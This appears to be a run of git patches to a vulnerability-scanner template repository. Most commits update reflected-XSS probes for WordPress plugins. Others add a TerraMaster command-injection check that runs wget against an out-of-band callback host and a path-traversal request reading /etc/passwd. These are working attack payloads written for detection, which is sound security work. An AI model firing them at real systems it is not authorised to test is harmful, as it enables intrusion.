aff7f7fa64897ed7e5a3e3d86cacfcb5b061cf5a Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 19 Jul 2021 11:34:59 +0530 Subject: [PATCH 0860/4083] Update CVE-2019-19134.yaml --- cves/2019/CVE-2019-19134.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2019/CVE-2019-19134.yaml b/cves/2019/CVE-2019-19134.yaml index 5aeed95083..89c923f6b0 100644 --- a/cves/2019/CVE-2019-19134.yaml +++ b/cves/2019/CVE-2019-19134.yaml @@ -11,13 +11,13 @@ info: requests: - method: GET path: - - '{{BaseURL}}/wp-content/plugins/hmapsprem/views/dashboard/index.php?p=/wp-content/plugins/hmapsprem/foo%22%3E%3Csvg//onload=%22alert(123)%22%3E' + - '{{BaseURL}}/wp-content/plugins/hmapsprem/views/dashboard/index.php?p=/wp-content/plugins/hmapsprem/foo%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' matchers-condition: and matchers: - type: word words: - - 'foo">' + - 'foo">' part: body - type: word From c22839b3fd25435afc97d5f845226903b77652cb Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 19 Jul 2021 11:35:24 +0530 Subject: [PATCH 0861/4083] Update CVE-2020-12054.yaml --- cves/2020/CVE-2020-12054.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2020/CVE-2020-12054.yaml b/cves/2020/CVE-2020-12054.yaml index 11b19bcd64..2ab2fab4c9 100644 --- a/cves/2020/CVE-2020-12054.yaml +++ b/cves/2020/CVE-2020-12054.yaml @@ -11,13 +11,13 @@ info: requests: - method: GET path: - - '{{BaseURL}}/?s=%3Cimg%20src%3Dx%20onerror%3Dalert%28123%29%3B%3E' + - '{{BaseURL}}/?s=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' matchers-condition: and matchers: - type: word words: - - "" + - "" - "catch-breadcrumb" part: body condition: and From 75c5a8c68e0329e48fd31910f037f5fdc21667e3 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 19 Jul 2021 11:35:47 +0530 Subject: [PATCH 0862/4083] Update CVE-2020-17362.yaml --- cves/2020/CVE-2020-17362.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2020/CVE-2020-17362.yaml b/cves/2020/CVE-2020-17362.yaml index 0fdc277777..f448fae016 100644 --- a/cves/2020/CVE-2020-17362.yaml +++ b/cves/2020/CVE-2020-17362.yaml @@ -11,13 +11,13 @@ info: requests: - method: GET path: - - '{{BaseURL}}/?s=%3Cimg%20src%20onerror=alert(123)%3E' + - '{{BaseURL}}/?s=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' matchers-condition: and matchers: - type: word words: - - "" + - "" part: body - type: word From 06a82e2c78e19a9aef718942de2963311550f4cb Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 19 Jul 2021 11:36:11 +0530 Subject: [PATCH 0863/4083] Update CVE-2021-24298.yaml --- cves/2021/CVE-2021-24298.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2021/CVE-2021-24298.yaml b/cves/2021/CVE-2021-24298.yaml index b57d43a804..40b4fa673f 100644 --- a/cves/2021/CVE-2021-24298.yaml +++ b/cves/2021/CVE-2021-24298.yaml @@ -11,13 +11,13 @@ info: requests: - method: GET path: - - '{{BaseURL}}/giveaway/mygiveaways/?share=%3Cscript%3Ealert(123)%3C/script%3E' + - '{{BaseURL}}/giveaway/mygiveaways/?share=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' matchers-condition: and matchers: - type: word words: - - "" + - "" part: body - type: word From c8ee50bd9b07c73be46b4425551e8d706869f15c Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 19 Jul 2021 11:36:45 +0530 Subject: [PATCH 0864/4083] Update CVE-2021-24320.yaml --- cves/2021/CVE-2021-24320.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2021/CVE-2021-24320.yaml b/cves/2021/CVE-2021-24320.yaml index 42d961669c..27ed4e29d1 100644 --- a/cves/2021/CVE-2021-24320.yaml +++ b/cves/2021/CVE-2021-24320.yaml @@ -11,13 +11,13 @@ info: requests: - method: GET path: - - '{{BaseURL}}/listing/?listing_list_view=standard13%22%3E%3Cimg%20src%3Dx%20onerror%3D%28alert%29%28123%29%3B%3E' + - '{{BaseURL}}/listing/?listing_list_view=standard13%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' matchers-condition: and matchers: - type: word words: - - "" + - "" part: body - type: word From 751f4e099c007a44bcf88350093d81645ae12988 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 19 Jul 2021 11:37:18 +0530 Subject: [PATCH 0865/4083] Update CVE-2021-24335.yaml --- cves/2021/CVE-2021-24335.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2021/CVE-2021-24335.yaml b/cves/2021/CVE-2021-24335.yaml index ea7b58161e..960dfbe32b 100644 --- a/cves/2021/CVE-2021-24335.yaml +++ b/cves/2021/CVE-2021-24335.yaml @@ -11,13 +11,13 @@ info: requests: - method: GET path: - - '{{BaseURL}}/car1/estimateresult/result?s=&serviceestimatekey=%3Cimg%20src%3Dx%20onerror%3Dalert%28123%29%3B%3E' + - '{{BaseURL}}/car1/estimateresult/result?s=&serviceestimatekey=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' matchers-condition: and matchers: - type: word words: - - "" + - "" part: body - type: word From 707083438e00d915787569e0b4d9985b68144b00 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 19 Jul 2021 11:37:51 +0530 Subject: [PATCH 0866/4083] Update CVE-2021-24389.yaml --- cves/2021/CVE-2021-24389.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2021/CVE-2021-24389.yaml b/cves/2021/CVE-2021-24389.yaml index e8b37ed246..3b6b1bb833 100644 --- a/cves/2021/CVE-2021-24389.yaml +++ b/cves/2021/CVE-2021-24389.yaml @@ -11,13 +11,13 @@ info: requests: - method: GET path: - - '{{BaseURL}}/listings/?search_title=&location=&foodbakery_locations_position=filter&search_type=autocomplete&foodbakery_radius=10%22%3E%3Cscript%3Eprompt(123)%3C/script%3E' + - '{{BaseURL}}/listings/?search_title=&location=&foodbakery_locations_position=filter&search_type=autocomplete&foodbakery_radius=10%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' matchers-condition: and matchers: - type: word words: - - "" + - "" part: body - type: word From ac66db36f3332ad6dd77c0dfe475878f0f546f9e Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 19 Jul 2021 11:38:22 +0530 Subject: [PATCH 0867/4083] Update wp-church-admin-xss.yaml --- vulnerabilities/wordpress/wp-church-admin-xss.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/vulnerabilities/wordpress/wp-church-admin-xss.yaml b/vulnerabilities/wordpress/wp-church-admin-xss.yaml index 1b5fa990ab..f5c5957b97 100644 --- a/vulnerabilities/wordpress/wp-church-admin-xss.yaml +++ b/vulnerabilities/wordpress/wp-church-admin-xss.yaml @@ -10,13 +10,13 @@ info: requests: - method: GET path: - - "{{BaseURL}}/wp-content/plugins/church-admin/includes/validate.php?id=%3Cscript%3Ealert%28'{{randstr}}'%29%3C/script%3E" + - "{{BaseURL}}/wp-content/plugins/church-admin/includes/validate.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" matchers-condition: and matchers: - type: word words: - - "" + - "" part: body - type: word From 57c3f3ec20722553b2a236db2f0f20ce3103906d Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 19 Jul 2021 11:38:50 +0530 Subject: [PATCH 0868/4083] Update wp-custom-tables-xss.yaml --- vulnerabilities/wordpress/wp-custom-tables-xss.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/vulnerabilities/wordpress/wp-custom-tables-xss.yaml b/vulnerabilities/wordpress/wp-custom-tables-xss.yaml index d29132cf89..c0918d72c5 100644 --- a/vulnerabilities/wordpress/wp-custom-tables-xss.yaml +++ b/vulnerabilities/wordpress/wp-custom-tables-xss.yaml @@ -11,13 +11,13 @@ info: requests: - method: GET path: - - '{{BaseURL}}/wp-content/plugins/custom-tables/iframe.php?s=1&key=%22%3E%3Cscript%3Ealert%28123%29%3C/script%3E' + - '{{BaseURL}}/wp-content/plugins/custom-tables/iframe.php?s=1&key=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' matchers-condition: and matchers: - type: word words: - - "" + - "" part: body - type: word From 705f431c1cf016cf1a9a627ca911a49f9be8598a Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 19 Jul 2021 11:39:33 +0530 Subject: [PATCH 0869/4083] Update wp-finder-xss.yaml --- vulnerabilities/wordpress/wp-finder-xss.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/vulnerabilities/wordpress/wp-finder-xss.yaml b/vulnerabilities/wordpress/wp-finder-xss.yaml index c2141ac880..1bbd46235e 100644 --- a/vulnerabilities/wordpress/wp-finder-xss.yaml +++ b/vulnerabilities/wordpress/wp-finder-xss.yaml @@ -10,13 +10,13 @@ info: requests: - method: GET path: - - '{{BaseURL}}/wp-content/plugins/finder/index.php?by=type&dir=tv&order=%22%3E%3Cscript%3Ealert(123);%3C/script%3E' + - '{{BaseURL}}/wp-content/plugins/finder/index.php?by=type&dir=tv&order=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' matchers-condition: and matchers: - type: word words: - - "" + - "" part: body - type: word From e14b31489b134d68f97935b4203b92af34104279 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 19 Jul 2021 11:40:14 +0530 Subject: [PATCH 0870/4083] Update wp-flagem-xss.yaml --- vulnerabilities/wordpress/wp-flagem-xss.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/vulnerabilities/wordpress/wp-flagem-xss.yaml b/vulnerabilities/wordpress/wp-flagem-xss.yaml index bcd78b1677..90505bc2e4 100644 --- a/vulnerabilities/wordpress/wp-flagem-xss.yaml +++ b/vulnerabilities/wordpress/wp-flagem-xss.yaml @@ -10,13 +10,13 @@ info: requests: - method: GET path: - - '{{BaseURL}}/wp-content/plugins/FlagEm/flagit.php?cID=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E' + - '{{BaseURL}}/wp-content/plugins/FlagEm/flagit.php?cID=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' matchers-condition: and matchers: - type: word words: - - "" + - "" part: body - type: word From 0329b1b2fb59b7f4b5ddb0c0ffe387f85a4df6b0 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 19 Jul 2021 11:40:45 +0530 Subject: [PATCH 0871/4083] Update wp-knews-xss.yaml --- vulnerabilities/wordpress/wp-knews-xss.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/vulnerabilities/wordpress/wp-knews-xss.yaml b/vulnerabilities/wordpress/wp-knews-xss.yaml index 198ba8e35e..9b0815e576 100644 --- a/vulnerabilities/wordpress/wp-knews-xss.yaml +++ b/vulnerabilities/wordpress/wp-knews-xss.yaml @@ -10,13 +10,13 @@ info: requests: - method: GET path: - - '{{BaseURL}}/wp-content/plugins/knews/wysiwyg/fontpicker/?ff=%22%3E%3Cscript%3Ealert%28123%29%3C/script%3E ' + - '{{BaseURL}}/wp-content/plugins/knews/wysiwyg/fontpicker/?ff=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' matchers-condition: and matchers: - type: word words: - - "" + - "" part: body - type: word From 4df08a33c4f81ccd7919b5d935f8b2efbb8216a7 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 19 Jul 2021 11:41:15 +0530 Subject: [PATCH 0872/4083] Update wp-nextgen-xss.yaml --- vulnerabilities/wordpress/wp-nextgen-xss.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/vulnerabilities/wordpress/wp-nextgen-xss.yaml b/vulnerabilities/wordpress/wp-nextgen-xss.yaml index 30f3806e85..e4b63e62aa 100644 --- a/vulnerabilities/wordpress/wp-nextgen-xss.yaml +++ b/vulnerabilities/wordpress/wp-nextgen-xss.yaml @@ -10,13 +10,13 @@ info: requests: - method: GET path: - - '{{BaseURL}}/wp-content/plugins/nextgen-gallery/nggallery.php?test-head=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E' + - '{{BaseURL}}/wp-content/plugins/nextgen-gallery/nggallery.php?test-head=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' matchers-condition: and matchers: - type: word words: - - "" + - "" part: body - type: word From f77f66d1e6b1fc2930ab19bf56a9158a70b3f24c Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 19 Jul 2021 11:41:40 +0530 Subject: [PATCH 0873/4083] Update wp-phpfreechat-xss.yaml --- vulnerabilities/wordpress/wp-phpfreechat-xss.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/vulnerabilities/wordpress/wp-phpfreechat-xss.yaml b/vulnerabilities/wordpress/wp-phpfreechat-xss.yaml index 986f90815a..c908448c5d 100644 --- a/vulnerabilities/wordpress/wp-phpfreechat-xss.yaml +++ b/vulnerabilities/wordpress/wp-phpfreechat-xss.yaml @@ -10,13 +10,13 @@ info: requests: - method: GET path: - - '{{BaseURL}}/wp-content/plugins/phpfreechat/lib/csstidy-1.2/css_optimiser.php?url=%22%3E%3Cscript%3Ealert%28123%29%3C/script%3E' + - '{{BaseURL}}/wp-content/plugins/phpfreechat/lib/csstidy-1.2/css_optimiser.php?url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' matchers-condition: and matchers: - type: word words: - - "" + - "" part: body - type: word From 5fcbd0e44642b86f7a44b3345fd46609177e60d8 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 19 Jul 2021 11:42:34 +0530 Subject: [PATCH 0874/4083] Update wp-slideshow-xss.yaml --- vulnerabilities/wordpress/wp-slideshow-xss.yaml | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/vulnerabilities/wordpress/wp-slideshow-xss.yaml b/vulnerabilities/wordpress/wp-slideshow-xss.yaml index 41649c222c..61a03ab44b 100644 --- a/vulnerabilities/wordpress/wp-slideshow-xss.yaml +++ b/vulnerabilities/wordpress/wp-slideshow-xss.yaml @@ -10,16 +10,16 @@ info: requests: - method: GET path: - - '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPlugin/slideshow.php?randomId=%22%3B%3E%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E' - - '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPlugin/slideshow.php?slides[0][type]=text&slides[0][title]=%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E' - - '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPluginPostType/settings.php?settings[][group]=%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E' - - '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPluginPostType/style-settings.php?settings[0]&inputFields[0]=%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E' + - '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPlugin/slideshow.php?randomId=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' +# - '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPlugin/slideshow.php?slides[0][type]=text&slides[0][title]=%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E' +# - '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPluginPostType/settings.php?settings[][group]=%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E' +# - '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPluginPostType/style-settings.php?settings[0]&inputFields[0]=%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E' matchers-condition: and matchers: - type: word words: - - "" + - "" part: body - type: word From 574245af0ddcb266cf553914cb82390c3c10bc27 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 19 Jul 2021 11:43:07 +0530 Subject: [PATCH 0875/4083] Update wp-socialfit-xss.yaml --- vulnerabilities/wordpress/wp-socialfit-xss.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/vulnerabilities/wordpress/wp-socialfit-xss.yaml b/vulnerabilities/wordpress/wp-socialfit-xss.yaml index 50082d82a4..3da8d47f03 100644 --- a/vulnerabilities/wordpress/wp-socialfit-xss.yaml +++ b/vulnerabilities/wordpress/wp-socialfit-xss.yaml @@ -13,13 +13,13 @@ info: requests: - method: GET path: - - '{{BaseURL}}/wp-content/plugins/socialfit/popup.php?service=googleplus&msg=%3Cscript%3Ealert%281%29%3C/script%3E' + - '{{BaseURL}}/wp-content/plugins/socialfit/popup.php?service=googleplus&msg=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' matchers-condition: and matchers: - type: word part: body words: - - '' + - '' - type: word part: header words: From edabf1e7ca535c9dd542febdd93c7bbe1df59450 Mon Sep 17 00:00:00 2001 From: GwanYeong Kim Date: Mon, 19 Jul 2021 15:13:57 +0900 Subject: [PATCH 0876/4083] Create CVE-2020-28188.yaml Remote Command Execution (RCE) vulnerability in TerraMaster TOS <= 4.2.06 allow remote unauthenticated attackers to inject OS commands via /include/makecvs.php in Event parameter. Signed-off-by: GwanYeong Kim --- cves/2020/CVE-2020-28188.yaml | 35 +++++++++++++++++++++++++++++++++++ 1 file changed, 35 insertions(+) create mode 100644 cves/2020/CVE-2020-28188.yaml diff --git a/cves/2020/CVE-2020-28188.yaml b/cves/2020/CVE-2020-28188.yaml new file mode 100644 index 0000000000..b36fb1689b --- /dev/null +++ b/cves/2020/CVE-2020-28188.yaml @@ -0,0 +1,35 @@ +id: CVE-2020-28188 + +info: + name: TerraMaster TOS - Unauthenticated Remote Command Execution + author: gy741 + severity: critical + description: Remote Command Execution (RCE) vulnerability in TerraMaster TOS <= 4.2.06 allow remote unauthenticated attackers to inject OS commands via /include/makecvs.php in Event parameter. + reference: | + - https://www.ihteam.net/advisory/terramaster-tos-multiple-vulnerabilities/ + - https://www.pentest.com.tr/exploits/TerraMaster-TOS-4-2-06-Unauthenticated-Remote-Code-Execution.html + - https://research.checkpoint.com/2021/freakout-leveraging-newest-vulnerabilities-for-creating-a-botnet/ + tags: cve,cve2020,terramaster,rce,oob + +requests: + - raw: + - | + GET /include/makecvs.php?Event=%60wget%20http%3A%2F%2F{{interactsh-url}}%60 HTTP/1.1 + Host: {{Hostname}} + User-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36 + Accept-Encoding: gzip, deflate + Accept: */* + Connection: keep-alive + + GET /tos/index.php?explorer/pathList&path=%60wget%20http%3A%2F%2F{{interactsh-url}}%60 HTTP/1.1 + Host: {{Hostname}} + User-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36 + Accept-Encoding: gzip, deflate + Accept: */* + Connection: keep-alive + + matchers: + - type: word + part: interactsh_protocol # Confirms the HTTP Interaction + words: + - "http" From 924b9d7f5d8b1bf74ddaaf71cdad5b69ad9a0827 Mon Sep 17 00:00:00 2001 From: GwanYeong Kim Date: Mon, 19 Jul 2021 15:36:42 +0900 Subject: [PATCH 0877/4083] Create terramaster-login.yaml Signed-off-by: GwanYeong Kim --- exposed-panels/terramaster-login.yaml | 26 ++++++++++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 exposed-panels/terramaster-login.yaml diff --git a/exposed-panels/terramaster-login.yaml b/exposed-panels/terramaster-login.yaml new file mode 100644 index 0000000000..a5f6a1017d --- /dev/null +++ b/exposed-panels/terramaster-login.yaml @@ -0,0 +1,26 @@ +id: terramaster-login + +info: + name: TerraMaster Login Panel + author: gy741 + severity: info + tags: panel,terramaster + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: or + matchers: + - type: word + words: + - "TOS Loading" + part: body + + - type: word + words: + - "Server: TOS" + - "X-Powered-By: TerraMaster" + condition: or + part: header From 5a5b5ea18edb8697c9b5072d325b2d8bf299c660 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Mon, 19 Jul 2021 17:16:19 +0700 Subject: [PATCH 0878/4083] Create CVE-2018-16059.yaml --- cves/2018/CVE-2018-16059.yaml | 26 ++++++++++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 cves/2018/CVE-2018-16059.yaml diff --git a/cves/2018/CVE-2018-16059.yaml b/cves/2018/CVE-2018-16059.yaml new file mode 100644 index 0000000000..030e0e9f95 --- /dev/null +++ b/cves/2018/CVE-2018-16059.yaml @@ -0,0 +1,26 @@ +id: CVE-2018-16059 + +info: + name: WirelessHART Fieldgate SWG70 3.0 - Directory Traversal + author: daffainfo + severity: high + reference: https://www.exploit-db.com/exploits/45342 + tags: cve,cve2018,iot,lfi + +requests: + - method: POST + path: + - "{{BaseURL}}/fcgi-bin/wgsetcgi" + body: 'action=ajax&command=4&filename=../../../../../../../../../../etc/passwd&origin=cw.Communication.File.Read&transaction=fileCommand' + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:[x*]:0:0" + part: body + + - type: status + status: + - 200 From 59c091c6f66de4882bc5ff8a728a6d888311adbd Mon Sep 17 00:00:00 2001 From: jeyaseelan8 <45196752+jeyaseelan8@users.noreply.github.com> Date: Mon, 19 Jul 2021 16:31:14 +0530 Subject: [PATCH 0879/4083] Update dell-idrac9-default-login.yaml --- default-logins/dell/dell-idrac9-default-login.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/default-logins/dell/dell-idrac9-default-login.yaml b/default-logins/dell/dell-idrac9-default-login.yaml index 6e90d9208e..10fe93be8f 100644 --- a/default-logins/dell/dell-idrac9-default-login.yaml +++ b/default-logins/dell/dell-idrac9-default-login.yaml @@ -24,7 +24,7 @@ requests: matchers: - type: status status: - - 200 + - 201 - type: word part: body words: From 7d9dbc4aad3a97901a7c169fdc25b6e5d82002c2 Mon Sep 17 00:00:00 2001 From: sandeep Date: Mon, 19 Jul 2021 16:41:12 +0530 Subject: [PATCH 0880/4083] Update CVE-2020-28188.yaml --- cves/2020/CVE-2020-28188.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2020/CVE-2020-28188.yaml b/cves/2020/CVE-2020-28188.yaml index b36fb1689b..acf4e53aa4 100644 --- a/cves/2020/CVE-2020-28188.yaml +++ b/cves/2020/CVE-2020-28188.yaml @@ -8,7 +8,7 @@ info: reference: | - https://www.ihteam.net/advisory/terramaster-tos-multiple-vulnerabilities/ - https://www.pentest.com.tr/exploits/TerraMaster-TOS-4-2-06-Unauthenticated-Remote-Code-Execution.html - - https://research.checkpoint.com/2021/freakout-leveraging-newest-vulnerabilities-for-creating-a-botnet/ + - https://research.checkpoint.com/2021/freakout-leveraging-newest-vulnerabilities-for-creating-a-botnet/ tags: cve,cve2020,terramaster,rce,oob requests: From eec253fdd823de08e20f9dc252938b875c27738e Mon Sep 17 00:00:00 2001 From: sandeep Date: Mon, 19 Jul 2021 16:53:47 +0530 Subject: [PATCH 0881/4083] minor update --- cves/2021/CVE-2021-24498.yaml | 8 +++++++- 1 file changed, 7 insertions(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-24498.yaml b/cves/2021/CVE-2021-24498.yaml index a24a3fd3cb..64eccc35f9 100644 --- a/cves/2021/CVE-2021-24498.yaml +++ b/cves/2021/CVE-2021-24498.yaml @@ -5,7 +5,7 @@ info: author: suman_kar description: The plugin does not sanitise or escape the 'start' and 'end' GET parameters before outputting them in the page (via php/edit.php), leading to a reflected Cross-Site Scripting issue. severity: medium - tags: cve,cve2021,xss,wordpress + tags: cve,cve2021,xss,wordpress,wp-plugin reference: https://wpscan.com/vulnerability/3c5a5187-42b3-4f88-9b0e-4fdfa1c39e86 requests: @@ -16,6 +16,7 @@ requests: Accept-Encoding: gzip, deflate Accept-Language: en-GB,en-US;q=0.9,en;q=0.8 Connection: close + matchers-condition: and matchers: - type: word @@ -25,6 +26,11 @@ requests: part: body condition: and + - type: word + words: + - 'text/html' + part: header + - type: status status: - 200 From 384fb5c0f8f2f171947309d927a34f616aa0d5c1 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 19 Jul 2021 11:25:34 +0000 Subject: [PATCH 0882/4083] Auto Update README [Mon Jul 19 11:25:34 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index ff039144bf..b22a9d0c8b 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 465 | vulnerabilities | 237 | exposed-panels | 201 | +| cves | 466 | vulnerabilities | 237 | exposed-panels | 201 | | takeovers | 70 | exposures | 116 | technologies | 125 | | misconfiguration | 77 | workflows | 33 | miscellaneous | 27 | | default-logins | 44 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**134 directories, 1603 files**. +**134 directories, 1604 files**. From a88710e503778a2246f06f7c59fa2ced7217e7a3 Mon Sep 17 00:00:00 2001 From: sandeep Date: Mon, 19 Jul 2021 16:56:45 +0530 Subject: [PATCH 0883/4083] Removed duplicate template --- .../wordpress/wp-localize-post-lfi.yaml | 19 ------------------- 1 file changed, 19 deletions(-) delete mode 100644 vulnerabilities/wordpress/wp-localize-post-lfi.yaml diff --git a/vulnerabilities/wordpress/wp-localize-post-lfi.yaml b/vulnerabilities/wordpress/wp-localize-post-lfi.yaml deleted file mode 100644 index 625bbb737a..0000000000 --- a/vulnerabilities/wordpress/wp-localize-post-lfi.yaml +++ /dev/null @@ -1,19 +0,0 @@ -id: wp-localize-post-lfi - -info: - name: WordPress Plugin Localize My Post 1.0 - Local File Inclusion - author: 0x240x23elu - severity: high - reference: https://www.exploit-db.com/exploits/45439 - tags: wordpress,wp-plugin,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/plugins/localize-my-post/ajax/include.php?file=../../../../../../../../../../etc/passwd" - - matchers: - - type: regex - regex: - - "root:[x*]:0:0:" - part: body \ No newline at end of file From f56bfd81bfa0f8ed123dd52633a118675948c0fd Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 19 Jul 2021 11:28:26 +0000 Subject: [PATCH 0884/4083] Auto Update README [Mon Jul 19 11:28:26 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index b22a9d0c8b..34d4a2aac4 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 466 | vulnerabilities | 237 | exposed-panels | 201 | +| cves | 467 | vulnerabilities | 237 | exposed-panels | 202 | | takeovers | 70 | exposures | 116 | technologies | 125 | | misconfiguration | 77 | workflows | 33 | miscellaneous | 27 | | default-logins | 44 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**134 directories, 1604 files**. +**134 directories, 1606 files**. From 5833092a53cebf62a0a232a975b4627e0af74cd1 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 19 Jul 2021 11:29:52 +0000 Subject: [PATCH 0885/4083] Auto Update README [Mon Jul 19 11:29:52 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 34d4a2aac4..ce8b9da810 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 467 | vulnerabilities | 237 | exposed-panels | 202 | +| cves | 467 | vulnerabilities | 236 | exposed-panels | 202 | | takeovers | 70 | exposures | 116 | technologies | 125 | | misconfiguration | 77 | workflows | 33 | miscellaneous | 27 | | default-logins | 44 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**134 directories, 1606 files**. +**134 directories, 1605 files**. From 2d6198ba047fea3f4d9ff6543164f47fd184b8f5 Mon Sep 17 00:00:00 2001 From: sandeep Date: Mon, 19 Jul 2021 18:13:09 +0530 Subject: [PATCH 0886/4083] Updated payload + matcher --- cves/2019/CVE-2019-18394.yaml | 8 +++++--- 1 file changed, 5 insertions(+), 3 deletions(-) diff --git 